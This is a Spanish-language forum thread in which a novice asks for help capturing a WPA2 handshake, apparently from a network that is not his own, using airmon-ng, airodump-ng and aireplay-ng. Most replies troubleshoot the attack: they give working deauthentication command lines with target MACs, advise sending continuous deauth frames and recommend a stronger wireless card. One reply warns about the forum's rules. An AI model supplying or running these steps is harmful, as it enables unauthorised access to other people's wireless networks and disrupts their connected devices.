No consigo Handshake

Iniciado por Miangasa, 29 Agosto 2011, 22:56 PM

0 Miembros y 1 Visitante están viendo este tema.

Miangasa

Estimados maestros:

A ver si me podeis ayudar, pues en este mundillo de Linux soy un total negado.
Intento conseguir una WPA, pero me da problemas con el handshake.

Paso a detallaros mis pasos a ver dónde cometo el error.

1- airmon-ng start wlan0
2- airodump-ng mon0
3- airodump-ng -w capture --bssid 00:11:22:33:44:55 -c 6 mon0

y me aparece esta pantalla
-------------------------
CH 6 ][ Elapsed: 2 mins ]
BSSID                   PWR RXQ   Beacons      #Data, #/s   CH MB     ENC   CIPHER  AUTH  ESSID
00:11:22:33:44:55 -53   90      1311           1088     0      6  54      WPA2 TKIP      PSK    ******

BSSID                   STATION                  PWR  Rate        Lost    Packets   Probes
00:11:22:33:44:55  66:77:88:99:00:11   -61    54  -54         0       1222
-------------------------
4- abro otra consola
    aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 mon0

y me responde de la siguiente manera:
-------------------------
Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 1|57 ACKs]
-------------------------

¿Qué hago mal?
Tengan en cuenta al responder que tengo los mismos conocimientos de Linux que un Guacamole.

Muchas gracias.

PD: y después podríais decirme que modalidad de aircrack-ng o john utilizo?

miguelskk

Supongo que la mac la has cambiado para explicar la duda, que no sera la verdadera del bssid que quieres crackear XD
Si has puesto bien el canal en que trabaja el AP que por cierto se suele poner -c6 en vez de -c(espacio)6 aunque no creo que sea el problema, normalmente es cosa de la tarjeta wireless que tendra poca sensibilidad y no consigue inyectar bien tráfico para desconectar al station, que cuando se reconecta es cuando obtienes el handshake.
Prueba a acercarte al AP y si no puedes, especificanos el modelo de la tarjeta de red que utilizas y asi te podremos ayudar mejor ;)
Ellos levantan muros y vallas por todas partes, nosotros respondemos escribiendo nuestros nombres, ellos se cabrean y dicen que eso no es arte.

Miangasa

Lo siento, no puedo acercarme, pues estoy al límite de mi casa.

La tarjeta es una D-Link DWL-G510. Con la cual sí he podido sacar una WEP, pero se resiste con las WAP.

Muchas gracias

miguelskk

Quizas sea cuestion de dejar mas tiempo el ordenador inyectando trafico, la verdad es que no se que tal sera tu tarjeta, pero si te decides a cambiar te recomendaria la alfa 1W chipset 8187L que es la que utilizo yo y en relación calidad precio esta bastante bien, compatible con backtrack, pero aun asi no esta garantizado que puedas crackearlo ya que el factor limitante es la distancia del AP y de la STATION asique no creas que por cambiar la tarjeta tus problemas se vayan a solucionar.
Un saludo
Ellos levantan muros y vallas por todas partes, nosotros respondemos escribiendo nuestros nombres, ellos se cabrean y dicen que eso no es arte.

lenin1818

Cita de: miguelskk en 30 Agosto 2011, 00:21 AM
Quizas sea cuestion de dejar mas tiempo el ordenador inyectando trafico,

en las wpa no se inyecta trafico

Cita de: Miangasa en 29 Agosto 2011, 23:53 PM
Lo siento, no puedo acercarme, pues estoy al límite de mi casa.


si no es tu red deberias de leer las reglas del foro

Cita de: Miangasa en 29 Agosto 2011, 22:56 PM
---
4- abro otra consola
    aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 mon0

y me responde de la siguiente manera:
-------------------------
Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 1|57 ACKs]
-------------------------



despues de que pones --deauth solo pones un 1 este 1 es el numero de desauntetificaciones que mandas si mandas solo 1 pues es casi imposible obtenerlo  manda unas 60 o de plano pon 0 para que te mande infinitas jeje

por otro lado haces las cosas bien lo que pasa en que necesitas mayor intensidad en la señal para poder desauntetificar al cliente, cuando lo desauntetificas  y se vuelve a conectar obtienes el handshake

dvdr

#5
aireplay-ng -0 0 -a BSSID -c Cliente asociado mon0  quiza tengas que lanzarlos varias veces

0


aireplay-ng -0 5 -a BSSID -c Cliente asociado mon0

ejemplo:
Citarairodump-ng --encrypt wpa --bssid 64:68:0c:d5:59:26 -c 3 -a -w WPA.cap (Tu interfaz)
CitarCon esto filtramos unicamente la linea que quieres "WLAN_xxx"

Luego tienes que deautenticar al cliente que está asociado a la línea:
Citaraireplay-ng -0 1 -a 64:68:0c:d5:59:26 -c 64:68:8c:9d:59:26 (Tu interfaz)


cambia el 0 por un 5 8  

puede ser que no estes al alcance para obtener el Handshake  hay programas graficos que rulan bien

<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg